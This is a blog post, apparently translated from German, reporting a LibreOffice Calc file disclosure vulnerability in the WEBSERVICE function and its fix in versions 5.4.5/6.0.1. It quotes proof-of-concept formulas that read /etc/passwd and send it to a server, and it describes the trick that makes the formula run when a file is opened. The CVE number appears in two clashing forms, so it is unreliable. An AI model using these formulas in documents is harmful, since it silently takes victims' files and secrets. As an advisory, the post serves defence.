[German]In LibreOffice there is a Remote Arbitrary File Disclosure vulnerability (CVE-2018-68719), allowing attackers to send files to the Internet using prepared table documents. This Remote Arbitrary File Disclosure vulnerability has been closed in LibreOffice 5.4.5/6.0.1.
Advertising
LibreOffice 6.0 just has been released. It's an free of charge alternative to Microsoft Office, which runs on different operating system platforms (Linux, macOS and Windows). Blog reader Ralf H. informed my this night by e-mail about a Remote Arbitrary File Disclosure vulnerability (CVE-2018-68719) in LibreOffice (thanks for that). There are now also posts at Hacker News, securelist.org and reddit.com.
Remote Arbitrary File Disclosure (CVE-2018-6871)
LibreOffice supports the function COM.MICROSOFT. EBSERVICE from Microsoft Office. A description of the feature available in Microsoft Excel 2013 and 2016 can be found on this Microsoft page. The purpose of this function in Excel is to retrieve data from a Web service on the Internet or intranet. To do this, you only need to pass the URL of the resource from the Internet/intranet as a parameter to the function.
=WEBSERVICE("http://mywebservice.com/serviceEndpoint?searchString=Excel")
Here is an example:
=FILTERXML(WEBSERVICE("http://api.openweathermap.org/data/2.5/forecast?q=Copenhagen,dk&mode=xml&units=metric");"number(/weatherdata/forecast/time[2]/temperature/@value)")
Microsoft implemented a significant limitation within this function:
Advertising
For protocols that are not supported, such as ftp: // or file: //, WEBSERVICE returns the #VALUE! error value.
In LibreOffice these restrictions were unfortunately not implemented before version 5.4.5/6.0.1. By default, the cells in LibreOffice Calc are not updated. However, if you specify a cell type such as ~error, the cell is updated when you open the document. This allows to send files about this vulnerability, they @jollheef (Mikhail Klementev) explained by seccomp. ru on GitHub. To read a file locally, you could use the following statement in LibreOffice Calc:
=WEBSERVICE("/etc/passwd")
Then the following statement is sufficient to read and send a file to an Internet server:
=WEBSERVICE("http://localhost:6000/?q=" & WEBSERVICE("/etc/passwd"))
In other LibreOffice modules a calc-table could be embedded. Then, the vulnerability CVE-2018-6871 allows the user to read and send any files to the Internet.
So it is relatively easy to send arbitrary files with keys, passwords and everything else. The success rate is 100%, and the whole thing happens invisibly in the background for the user – he doesn't notice anything of it. All it takes is a prepared file with the manipulated calc-table. The exploit or proof of concept of @jollheef works in all LibreOffice versions prior to 5.4.5/6.0.1 and all operating systems (GNU/Linux, MS Windows, MacOS etc.). The manipulated calc-table can be embedded in almost all formats supported by LO.
Bugs known and fixed in LibreOffice
The LibreOffice developers are aware of the error. It was published yesterday on this LibreOffice page. The problem has been solved in LibreOffice versions 5.4.5/6.0.1. The WEBSERVICE function has now been restricted to accessing http and https URLs and placing WEBSERVICE URLs under the link management infrastructure of LibreOffice Calc. So switch to LibreOffice versions 5.4.5/6.0.1 and higher as soon as possible.
Advertising